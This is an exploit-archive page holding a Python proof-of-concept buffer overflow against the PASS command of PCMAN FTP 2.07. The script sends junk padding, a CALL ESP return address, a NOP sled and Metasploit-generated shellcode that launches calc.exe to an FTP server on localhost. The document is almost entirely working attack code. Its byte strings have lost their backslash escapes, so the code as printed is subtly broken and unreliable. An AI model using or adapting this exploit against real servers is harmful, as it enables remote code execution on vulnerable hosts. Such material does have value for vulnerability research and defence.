[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PCMAN FTP 2.07 PASS Command - Buffer Overflow
# Published : 2013-08-02
# Author :
# Previous Title : HP Data Protector CMD Install Service Vulnerability (msf)
# Next Title : 返回列表
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
"""
PCMAN FTPD 2.07 PASS Command Buffer Overflow
Author: Ottomatik
Date: 2013-07-31
Software : PCMAN FTPD
Version : 2.07
Tested On: Windows 7 SP1 - French;
Description:
* The PASS Command is vulnerable to a buffer overflow;
* Other commads may be vulnerable;
"""
# Modules import;
import socket
def main() :
"""
Main function;
"""
buf = "PASS "
buf += "A" * 6102 # JUNK
# 0x75670253
buf += "x53x02x67x75" # @ CALL ESP Kernel32.dll
buf += "x90" * 40 # NOPs
# ShellCode : msfpayload windows_exec calc.exe, bad chars = 00,0A,0C,0D
buf +=("xddxc5xd9x74x24xf4x5ax31xc9xb8xd1x96xc1xcbxb1"
"x33x31x42x17x83xc2x04x03x93x85x23x3exefx42x2a"
"xc1x0fx93x4dx4bxeaxa2x5fx2fx7fx96x6fx3bx2dx1b"
"x1bx69xc5xa8x69xa6xeax19xc7x90xc5x9axe9x1cx89"
"x59x6bxe1xd3x8dx4bxd8x1cxc0x8ax1dx40x2bxdexf6"
"x0fx9excfx73x4dx23xf1x53xdax1bx89xd6x1cxefx23"
"xd8x4cx40x3fx92x74xeax67x03x85x3fx74x7fxccx34"
"x4fx0bxcfx9cx81xf4xfexe0x4excbxcfxecx8fx0bxf7"
"x0exfax67x04xb2xfdxb3x77x68x8bx21xdfxfbx2bx82"
"xdex28xadx41xecx85xb9x0exf0x18x6dx25x0cx90x90"
"xeax85xe2xb6x2excexb1xd7x77xaax14xe7x68x12xc8"
"x4dxe2xb0x1dxf7xa9xdexe0x75xd4xa7xe3x85xd7x87"
"x8bxb4x5cx48xcbx48xb7x2dx23x03x9ax07xacxcax4e"
"x1axb1xecxa4x58xccx6ex4dx20x2bx6ex24x25x77x28"
"xd4x57xe8xddxdaxc4x09xf4xb8x8bx99x94x10x2ex1a"
"x3ex6d")
buf += "rn"
clt_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clt_socket.connect(("127.0.0.1", 21))
print clt_socket.recv(2048)
clt_socket.send("USER anonymousrn")
print clt_socket.recv(2048)
clt_socket.send(buf)
print clt_socket.recv(2048)
clt_socket.close()
if __name__ == "__main__" :
main()